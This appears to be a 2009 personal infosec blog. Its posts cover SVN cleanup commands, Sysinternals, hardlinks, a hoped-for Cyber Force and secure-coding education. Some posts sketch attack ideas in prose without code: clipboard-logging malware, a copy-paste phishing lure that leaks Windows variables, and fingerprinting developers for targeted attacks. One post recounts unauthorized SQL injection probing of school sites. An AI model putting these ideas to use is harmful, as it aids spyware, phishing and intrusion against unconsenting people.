I was thinking today while I was using Remote Desktop to monitor one of the servers at work about how the clipboard is such a universally-accessible piece of the Windows operating system. To the extent of my knowledge, there is no real restriction on a program using or accessing it. A typical user will use the clipboard many many times a day, often copying important information and pasting it elsewhere.

Would it be feasible for a piece of malware to only monitor the clipboard and store all new text in a file? If so, the malware would stay relatively low profile and not draw any undue attention to itself. It would capture anything copied throughout the user's session. It would also capture anything copied in a remote desktop connection, since all things copied in remote desktop are also available to be pasted in the user's actual desktop (and visa versa). I am sure there are hundreds of other interesting situations where one could take advantage of the universality of the clipboard.

One interesting example of clipboard usage, although not related to capturing copied information, is related to RSnake's post about De-cloaking in IE7.0 using windows variables. All it would take for this to actually work is for a user to be sent an email with a link in it that doesn't go anywhere. Under the link, some text could say "Link not working? Copy and paste this into your address bar..." and boom! variable expansion and the accessed server has logged whatever expanded windows variables were contained in the copied url.

Monday, August 3, 2009

Removing .svn Folders (WINDOWS)

Sometimes I have to copy a folder for a school or work project that I manage with SVN. Usually I don't want to keep the original .svn folders. Instead of tediously going through each directory and deleting each .svn folder, I use something like this to delete all .svn folders in the current directory and subdirectories:
for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do @rmdir /s /q "%f"
You could make it be a little more verbose with it's output by using something like this:
@echo . & @echo Removing Directories: & @echo . & for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do @echo -- %f & @rmdir /s /q "%f"
In a more readable format, the command looks like:
@echo .
@echo Removing Directories:
@echo .

for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do
    @echo -- %f
    @rmdir /s /q "%f"
After sprinkling some new .svn folders throughout my hard drive, this is the resulting output:
.
Removing Directories:
.
-- C:\.svn
-- C:\Documents and Settings\.svn
-- C:\Documents and Settings\All Users\.svn
-- C:\Documents and Settings\All Users\Desktop\.svn
-- C:\Drivers\.svn
-- C:\Program Files\.svn
-- C:\Program Files\Adobe\.svn
-- C:\Program Files\Adobe\Reader 9.0\.svn
-- C:\WINDOWS\.svn

C:\>
Hope that helps :) Variations on this command have saved me a lot of time. If you need a better explanation of what everything does, let me know.

Monday, June 29, 2009

live.sysinternals.com/tools

Mark Russinovich's sysinternals tools come in very handy. A recent post over at the sunbelt blog shows that all of the sysinternals tools are easily accessible from the command line and even windows explorer. Below is an example of me testing this out:

C:\>\\live.sysinternals.com\tools\pslist.exe

pslist v1.28 - Sysinternals PsList
Copyright ⌐ 2000-2004 Mark Russinovich
Sysinternals

Process information for CONDORMAN:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   2    0      0     0:31:10.187     0:00:00.000
System                4   8  66  840      0     0:00:21.000     0:00:00.000
smss                644  11   3   21    172     0:00:00.015     0:19:50.041
csrss               872  13  12  824   6788     0:00:54.265     0:19:47.322
winlogon            896  13  18  523   6576     0:00:01.734     0:19:47.057
services            940   9  16  345   1812     0:00:07.484     0:19:46.291
lsass               952   9  22  466   4364     0:00:02.656     0:19:46.260
svchost            1112   8  18  226   2772     0:00:00.171     0:19:45.135

Tuesday, June 2, 2009

Client Fingerprinting

At my current job, I do a lot of programming with Flash (Flex, actually), as well as asp.net and similar platforms. I am constantly working on and debugging the web-apps I manage and develop. I have a debug flash player installed on most of the browsers I surf the web with, as well as numerous browser add-ons/extensions that help with development. I've been wondering lately if I should be more careful about the signature my browser creates.

A few weeks ago, I had a rather disconcerting thought that attackers might specifically target web developers for client side attacks. Who else would be a better target? Of all employees in a company, developers are probably given the most rights/permissions when they actually don't need them to get the job done. Also, developers require access to databases and test and production systems and are given more leeway than most.

One might ask: "Why would a developer as a potential target be preferred over someone else, such as a network admin, who also has access to critical systems?"
  • First, typical web developers are easily distinguished from normal traffic on a web site through information that is available from the browser, whereas system admins usually don't carry such an obvious signature when surfing the web.
  • Second, occasional erratic computer/browser behavior is something developers are accustomed to and is something those who work with the developers could easily explain away and dismiss.
  • Third, many web developers are not focused as much as they should be on the security of their apps, let alone their own personal security when they develop web applications.
  • Fourth, sites commonly visited by web-developers are easily identified. Sites (forums especially) that contain walkthroughs and tutorials for certain technologies and practices would most certainly be visited frequently by developers.
By targetting web developers, attackers would be able to focus their efforts on clients who have a greater potential for a good pay-off.

There are several applications that need special "debug" versions of a program to be installed in order for the developer to debug his applications. The foremost in my mind is the Flash Debug player. The Flash Debug player is very easily detected. It obviously has more functionality than the normal player, possibly additional functionality that has not been tested as well as the normal Flash Player's basic functionalities. The Flash Debug Player allows a debugger to connect to the loaded swf and step through the execution line by line. What were to happen if a malicious swf with additional debug information were loaded into a debugger? Although not very likely, it is something to think about, especially when several apps found online automatically display the "Connect to Remote Debugger" dialog when a Flash Debug player is installed. Also, since a debug flash player is so easily detected, it would be yet another easily obtained signature that would flag a user as being a developer.

Here are some common and basic "signatures" that I have come up with that should flag a user as being a web developer:
  • Firebug Extension/Add-on
  • Debug Flash Player
  • Web Developer Extension/Add-on
  • User Agent Switcher Extension/Add-on
  • Tamper Data Extension/Add-on
  • Codetech Extension/Add-on
  • Greasemonkey Extension/Add-on
  • Colorzilla Extension/Add-on
  • MeasureIt Extension/Add-on
  • Hundreds of others...
As to whether or not all of these can be detected on the client side still remains to be seen, although many of them already can be. (Firebug can for sure -- POC - open up gmail and turn on Firebug. Gmail should tell you that firebug slows Gmail down).

Also note that the general idea of fingerprinting clients through readily available information can be used not only to detect the presence of a web-developer, but also possibly to determine how "savvy" the user is with computer technologies, and to detect other "classes" of users (network admin, n00b, old person [?], hacker, teacher, designer, etc.).

Knowledge is power.

Monday, June 1, 2009

Cyber Force Cybercom

Over at TaoSecurity, a post was put up that talked about President Obama's "real" speech addressing cyber security. I started reading it and thought "Holy cow! This is awesome!" I got way excited and started writing up my thoughts on the creation of a Cyber Force branch of the military that was mentioned. After I had written down most of my thoughts, I saw a note at the bottom of the post that says
"Note: If you read this far I am sure you know this was not the President's "real speech." This is what I would have liked to have heard."
I decided to write up the rest of my thoughts on the matter. I kept my original excitement in as well :) Now on to my "real" post:

ps- I've run across an article that talks about a new "cyber command" that will be coming into play. Below are links to that article and other similar ones that seem to support this idea:
http://news.yahoo.com/s/afp/20090530/pl_afp/usitobamacomputercybersecuritymilitary
http://www.stripes.com/m/article.asp?section=104&article=63001
http://www.switched.com/2009/05/29/white-house-creating-new-cyber-command-office-for-military/

pps- Well, it's finally happened! I'm a little delayed putting this in here, but here it is. Defense Secretary Robert M. Gates has created a new command called Cybercom that will defend our networks at home and develop offensive weapons. An article at the Washington Post talks about it more.

President Obama gave a speech on cyber security last Friday. TaoSecurity had received a hard copy of the President's prepared remarks sometime before he actually gave his speech. At one point during his speech, he went off of what had been prepared (here's what he actually said). TaoSecurity made a post that talked about the things President Obama didn't say that were in his prepared speech. One of them is this:

"We will instruct the Secretary of Defense to examine the creation of a Cyber Force as an independent military branch. Just as we fight wars on land, at sea, and in the aerospace domains, we should promote warfighters thoroughly steeped in the intricacies of defense and attack in the cyberspace domain. We will also make it clear to our national adversaries that a cyber attack upon our national interests is equivalent to an attack in any other domain, and we will respond with the full range of diplomatic, information, military, and economic power at our disposal."

How cool is this?!?! This is actually something I've been thinking about and hoping for for quite some time. I've often wondered when the government would get around to thinking along the same lines. Creating another branch in the military whose area of expertise is cyber warfare will have a massive influence on our culture and perspective pertaining to computer security. Below is a list of several ways I think the US and the world will be influenced:
  1. Increased Awareness
    War hasn't changed too much over the years. Our troops muster up courage and travel to where the enemy is and show them who's boss. The front-lines of war seem to have remained away from our homes and daily routines. Until recently, that is. Our computer networks and digital infrastructure are increasingly becoming the targets of attacks from enemy nations. Speaking of this at such a high level doesn't quite carry across the potential impact that exists. Consider the following:

    Most people have a bank account. In the days before most banking was done online, it was necessary to physically go to the bank to withdraw/deposit money (who would've thought?) Imagine one day going to your bank, and the bank is gone, vanished. It was there the day before when you drove by, but now it is gone! All that exists where the bank was is a big black hole, or possibly a poster made with butcher paper and paint containing offensive reasons to fight against democracy. You try calling the bank, but you can't get through. You try purchasing a few items with your debit card, but the transaction fails. This is one thing that could happen if only our banks became the focus of attacks from enemy nations. Such an attack would affect each of our personal lives to an intense degree.

    The creation of a Cyber Force as a new military branch will pull cyber security into the lime light. The public should be made aware of why a new military branch is necessary and will come to realize how critical our digital infrastructure is. The public could be made aware through free programs and/or public demonstrations. The public demonstrations could demonstrate on a personal level how much we depend on our digital connections and how much an attack on them would affect us. I believe such demonstrations coupled with additional opportunities to learn would be most effective at informing the most people. This increased awareness will be the main impetus for the other points below.
  2. Digital Infrastructure == Mere Commodity National Asset
    The increased awareness described above will cause people to realize how vital our digital infrastructure is. It will begin to be viewed not only as a commodity and something nice to have around, but as something that is absolutely necessary for our nation to function in its current state. Hopefully, we will begin to not take it for granted and will view it as a national asset that we need to protect. We will become aware that it is one of our nations largest vital organs.
  3. Coding and Network Standards
    Contractors who create or offer products and services to the military usually must meet a much higher standard than the private sector's standards before their product/service will be considered or used. Their products/services will be on the "front-line" and will probably have to hold their own against enemy attacks of some kind. Other assets will depend on the functionality of this product to complete their missions. The failure of one product/service will drastically affect the outcome of the current mission and the integrity of the "team".

    As we become more aware, we will realize that our digital infrastructure is part of our front-line and is not being held to the same standards as our products/services on the traditional front-lines. Hopefully, we will realize that a lapse in security of one product/service will almost certainly affect the integrity of another. I believe that new forms of coding standards will be introduced, along with a way to enforce/regulate the type of code/network/service that is put on our "front-line".
  4. Increased Funding/Opportunities for Research
    With the creation of a new branch of the military, the government will be looking for companies to place bids on projects they need completed, and companies will be looking to meet the new demand for security solutions. More companies will enter this market and each of those companies will need their own security professionals and researchers. I believe this market will grow much larger than it currently is.

    The creation of the Cyber Force could also actually start a new "arms" race. This arms race would occur both inside the U.S. as competition between research groups and companies, and between the U.S and other countries. Research groups at Universities would also receive more funding to further our defensive and offensive technoligies in the field of cyber security. The new Cyber Force branch would need to have its own research teams and divisions as well.
  5. Additional Education/Development Programs
    Similar to how ROTC programs work with other branches of the military, I can easily foresee ROTC (or Cyber Force specific) programs being implemented. High-school and college students would jump into these programs headfirst and would enjoy it tremendously. These programs would have high enrollments, for everyone who likes computers at least secretly wishes they knew more about computer security and what is possible. The development programs would also have a very high retention rate, because of the nature of the subject matter itself. The courses would also have a high retention rate especially because those enrolled in them would most likely not be exposed to physical danger should they continue into the Cyber Force. I know if I were given such a chance to formally be taught about cyber security when I was in high-school with the possibility of being a professional in that field in the military, I would've jumped at the chance. I still would, actually.

    Few universities have majors that have an emphasis on Information Assurance/Computer Security, and even fewer have majors in this field. I believe higher education institutions would experience an increase in the number of students who are interested in computer security. This would spur the universities on to develop full programs centered on computer security, possibly with the creation of new majors and/or graduate degrees.

In my opinion, this is an EXCELLENT idea. I literally can't wait to see what comes out of this. I think it has the potential to be something amazing.

Thanks for reading!

Wednesday, May 27, 2009

Hardlinks vs Softlinks?

Lately I've been devouring security blogs I find, almost to an extent where I'm trying to cut back because I find I am making excuses to put off my homework and studies just a little longer so I can read one more extremely interesting article. Not that it's really that bad, but it is something I enjoy doing tremendously.

Better get back to the topic of this post though: Hardlinks vs Softlinks. What prompted me to look more into this is a post on Command Line Kung Fu that talks about file linking. Paul started off talking about how to link files on *nix platforms, and then Ed comes back and talks about how windows doesn't have a way to do this.

This caught me way off guard. I thought "What about using fsutil to create a hardlink? For example, you could use something similar to the example below to create a hardlink to a file:
C:\>fsutil hardlink create newfile.txt oldfile.txt
Hardlink created for C:\newfile.txt <<===>> C:\oldfile.txt
My first reaction was that maybe Ed forgot about that command, but I quickly dismissed that notion. If anything I probably didn't understand why Ed didn't count using fsutil hardlink create as an option for creating links.

After re-reading the post, I noticed a special requirement at the beginning that said there should be only one original of the file(s)/directory. From what I knew about hardlinks and fsutil, new files that are hardlinks to an existing file also become "originals." This means that deleting the original file that hardlinks were made from will not make the hardlinked files useless. They each will still maintain a copy of the file contents and will still be linked to eachother.

After a little more research into the matter, I came up with several main differences between hardlinks and softlinks.
  1. Softlinked files create something more akin to a shortcut to a file. This maintains only one original file.
  2. Deleting a hardlinked file does not delete all other hardlinked files, and a file is never "fully" deleted until all hardlinks to it are deleted.
  3. Softlinked files are useless without the original file
  4. Hardlinks cannot be made to directories
  5. Softlinks can be made to directories
  6. Hardlinks must exist in the same filesystem
Also, it is not possible to create hardlinks to/from alternate data streams, which would be very interesting.

As it turns out, I was right in assuming that Ed knows what he is talking about :)

Starting Up

A recent post on pauldotcom talks about ways to get started in the Information Security field. This is an article I wish I had found when I was first trying to get into it. Right now, I wouldn't say I'm currently in the field (meaning I don't have a job that deals directly with Information Security), but I definitely feel like I'm well on my way.

Most of the points someone would figure out if they were relatively smart and had common sense. One of the points mentioned getting involved with local groups (linux users groups, hacker groups, etc.), which was something I hadn't really thought of before (even though it makes total sense) that might help me gain more experience with computer security. If school and my job would give me more free time, I'd like to look into this option more.

Monday, May 18, 2009

Teach the Students!

This is a topic that I feel rather passionate about. I am starting some research into the top universities in the nation to see if any of them require some knowledge of secure programming before allowing their students to graduate. My guess is that none of them do.

Earlier this year, I took an upper-level course whose main subject was ethics and computers in society. Each of us were asked to give a presentation on a specific topic of our choosing that fell into one of the broader topics we were to discuss in class. I quickly chose to talk about something in the scope of computer security, but had a hard time choosing a specific topic. I wanted to talk about something that could influence my peers to become more aware and security conscious.

My original ideas ranged from making my peers generally aware of what an attacker is capable of to some of the consequences of attacking or hacking an application/network. One day, I was perusing one of my school's sites and followed my habit of tossing text into a form that would make it apparent whether or not the inputs were sanitized. Low and behold, I saw an SQL-error message appear where the search results should have been! I explored the site a little more and discovered that the entire site was vulnerable to SQL injection. Later that week, I discovered more of my school's sites that were vulnerable. These revelations were shocking to me, for I knew that student programmers had made those sites. I couldn't believe they weren't aware of something as simple as SQL-injection. I thought to myself that at least some basic knowledge or awareness of some security principles should be required before allowing a student to develop a website. I then realized that the entire undergrad curriculum never includes anything on the topic of secure programming or making us "future-programmers-of-the-world" more security aware. My topic had found me.

I started off my presentation with some basic php code to select data from a database based on a user's search. I asked the rest of the class if they saw anything wrong with the code. A few (meaning two or three) of my peers noticed the code was vulnerable to SQL injection. The rest were clueless and watched in amazement as I demonstrated what was possible if user inputs were not properly sanitized. Realizing that most of my peers were completely unaware of SQL injection was quite a shock to me, for I knew that many of them currently held jobs as web programmers and had hoped that upper-level computer science students would be better than that. I ended my presentation by pointing them to CWE/SANS' top 25 most dangerous programming errors site and practically begged them to become more aware of security concerns and issues.

Since my initial experience with my peers' lack of awareness of basic elements of secure web programming, I have constantly thought that one of the greatest ways to increase computer security in the world is to teach the students about it and to keep them informed. In all of the curriculum that is required for a computer science major at my university, none of the courses talk about security concerns and secure programming. This should be a requirement for all universities and colleges that offer Computer Science, Information Technology, Information Systems, or other related majors. Having a requirement to learn about these subjects would immensely help solve many of the security issues present in our world today. Yes, we should continue to educate and inform current professionals in the industry, but I feel that a bottom-up approach would be the most effective and have the greatest long-term impact. As many others have already said, awareness is one of the keys to combating computer security issues.

Wednesday, April 29, 2009

And so it begins

The first post, as well as a few tests: Code examples will look like this:
C:\WINDOWS>dir /s /b hosts //find the hosts file